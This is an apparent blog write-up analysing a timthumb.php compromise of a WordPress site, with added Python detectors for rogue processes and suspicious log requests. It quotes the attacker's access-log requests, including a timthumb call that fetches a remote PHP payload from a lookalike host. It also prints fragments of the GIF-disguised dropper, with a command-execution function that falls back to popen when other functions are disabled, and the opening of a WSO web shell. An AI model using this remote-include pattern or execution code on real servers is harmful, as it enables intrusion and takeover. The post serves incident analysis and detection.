I already wrote an article this week about the timthumb.php vulnerability, which allows hackers to upload and execute files via WordPress blogs.
Last time the hack took me by surprise; this time I was prepared. I had set up special monitoring for new processes, and tonight the trap worked. At 20:06 a fake process was launched under www-data:
# ps auxf | grep www
root     16995  0.0  0.0   87856   716 pts/0    S+   21:00   0:00  \_ grep www
www-data  7170  0.0  0.9  225316 40088 ?        S    14:06   0:00  \_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ?       Sl   17:37  29:36  \_ /usr/sbin/apache2 -k start
www-data  2594 14.3  9.0 1022848 366568 ?       Sl   18:30  21:24  \_ /usr/sbin/apache2 -k start
www-data  6318 11.5  9.0 1088992 364764 ?       Sl   19:13  12:19  \_ /usr/sbin/apache2 -k start
www-data 11256  0.0  0.0       0     0 ?        Z    20:06   0:00  \_ [sh]
www-data 11260 97.5  0.1   24592  5336 ?        R    20:06  52:26 /usr/sbin/httpd
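The trap that caught this can be automated. The following is an added example (not the author's monitoring script): it parses `ps auxf` output like the listing above and flags every process running as the web user whose command line is not the real Apache worker, which on this host is assumed to be `/usr/sbin/apache2 -k start`. The zombie `[sh]` and the `/usr/sbin/httpd` impostor both trip it.

```python
import re
from collections import namedtuple

# Constructed sample (adapted from the `ps auxf | grep www` output above):
# real Apache children plus the two rogue processes.
SAMPLE_PS = """\
root     16995  0.0  0.0   87856   716 pts/0    S+   21:00   0:00  \\_ grep www
www-data  7170  0.0  0.9  225316 40088 ?        S    14:06   0:00  \\_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ?       Sl   17:37  29:36  \\_ /usr/sbin/apache2 -k start
www-data 11256  0.0  0.0       0     0 ?        Z    20:06   0:00  \\_ [sh]
www-data 11260 97.5  0.1   24592  5336 ?        R    20:06  52:26 /usr/sbin/httpd
"""

WEB_USER = "www-data"
# Assumption: on this Debian-style host the only command line the web user
# should ever run is the Apache worker; anything else is an alarm.
EXPECTED_CMDS = {"/usr/sbin/apache2 -k start"}

Proc = namedtuple("Proc", "user pid stat cmd")


def parse_ps(text):
    """Parse `ps auxf` rows (USER PID %CPU %MEM VSZ RSS TTY STAT START TIME CMD)."""
    procs = []
    for line in text.splitlines():
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        cmd = re.sub(r"^[\s|\\_]*", "", fields[10])  # drop the -f tree prefix
        procs.append(Proc(fields[0], int(fields[1]), fields[7], cmd))
    return procs


def find_rogue(procs):
    """Processes owned by the web user whose command line is not the server."""
    return [p for p in procs if p.user == WEB_USER and p.cmd not in EXPECTED_CMDS]


def classify(p):
    """Label a rogue process the way an analyst would triage it."""
    if "Z" in p.stat:
        return "zombie"                      # exited child, like the [sh] above
    if re.search(r"httpd|apache", p.cmd):
        return "masquerading as web server"  # server-like name, not this host's binary
    return "unexpected command"


if __name__ == "__main__":
    for p in find_rogue(parse_ps(SAMPLE_PS)):
        print(f"ALERT pid={p.pid} stat={p.stat} cmd={p.cmd!r}: {classify(p)}")
```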
After a quick look through the access logs, I found the following entries:
184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200 139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=backup HTTP/1.1" 200 66 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=check HTTP/1.1" 200 135 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
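Two things in these entries are worth alerting on automatically: a timthumb.php request whose `src` points at a host that merely looks like an allowed image site (picasa.com.thomaswdufour.com is not picasa.com, it only contains it), and a `.php` file being served from the theme's cache directory, which should only ever hold images. The script below is an added example, not the author's code; the list of allowed image hosts is an assumption in the style of TimThumb's allowed-sites list, and the checks compare the hostname by suffix rather than by substring.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample: three requests from the access log above (user agent
# shortened) plus one made-up benign TimThumb resize for contrast.
SAMPLE_LOG = """\
184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/1.1" 400 582 "-" "Mozilla/5.0"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200 139 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Nov/2011:20:10:00 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com/photo.jpg&w=100 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "method target protocol", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Assumed whitelist of image hosts (example values, not the site's real config).
ALLOWED_SITES = ["picasa.com", "flickr.com", "blogger.com"]


def host_allowed(host, allowed):
    """Suffix match on the hostname: 'lh3.picasa.com' passes,
    'picasa.com.thomaswdufour.com' does not. A substring test would pass both."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def analyse(line):
    """Return a finding tuple (kind, client ip, detail) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, _status = m.groups()
    url = urlparse(target)
    qs = parse_qs(url.query)
    if url.path.endswith("/timthumb.php") and "src" in qs:
        src = urlparse(qs["src"][0])
        if src.scheme and not host_allowed(src.hostname or "", ALLOWED_SITES):
            return ("timthumb_remote_src", ip, src.hostname)
    if re.search(r"/cache/[^/]+\.php$", url.path):  # the cache dir should only hold images
        return ("php_in_cache_dir", ip, qs.get("act", [""])[0])
    return None


def scan(text):
    """Run analyse() over every log line and keep the findings."""
    return [f for f in map(analyse, text.splitlines()) if f]
```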
As soon as I saw timthumb.php in the log, I knew which hack this was. But this time it was a little different. In the last post only a single command was executed and the uploaded PHP file was rather small. This time the PHP file fetched from http://picasa.com.thomaswdufour.com/patcherfinal.php was rather big and even creates new sockets.
The file again starts with binary data, like this:
GIF89a?????���!�????,???????D?;?
// Coded [c] 2011 by v0ld3m0rt // Unknown Indonesian H4xx0r
error_reporting(0);
$uname = php_uname();
// base64 of an .htaccess that denies requests to *.php (php|php3|cgi|php4|php5) in the directory it is written to
$htaccess = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfGNnaXxwaHA0fHBocDUpJCI+DQogIGRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+";
// base64 of the WSO 2.1 web shell (the code that turns up again in inc.php below); truncated here
$data = "PD9waHANCi8qIFdTTyAyLjEgKFdlYiBTaGVsbCBieSBvUmIpICovDQppZighZmlsZV9leGlzdH....
But the more interesting part comes at the end:
// Tries every command-execution primitive in turn; a function removed via
// disable_functions fails the function_exists() test and the next one is tried,
// so popen() is the fallback when the four others are disabled.
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f)) $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}

// Appends $content to $path, creating the file if needed (used to drop the files below)
function CreateFile($path, $content) {
    $handle = fopen($path, "a+");
    fwrite($handle, $content);
    fclose($handle);
}
You can take a look at the full file here: external_patcherfinal.txt
The PHP script allows the hacker to execute commands on the server through the functions passthru, system and shell_exec. Those functions are disabled on my server. However, by falling back to the function popen, a forked command (in this case a bot) could still be launched, and it was executed right after the upload:
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
It doesn't stop here. As the access log shows, another file, 'inc.php', was accessed as well. Opened in a browser, it looks like this:

The file starts with the following code:
/* WSO 2.1 (Web Shell by oRb) */
if(!file_exists("data.php")) {
    WriteData();
Interesting: a PHP shell was uploaded. Let's take a look at it by modifying the password function:

Using this web shell, other files can be uploaded, executed, overwritten, and so on.
Two more files were found: data.php in the same directory and, in the cache folder, a file called 'sex'. The 'sex' file was actually a Perl script, most probably executed through the shell, and it is the source of the fake Apache process discovered at the start.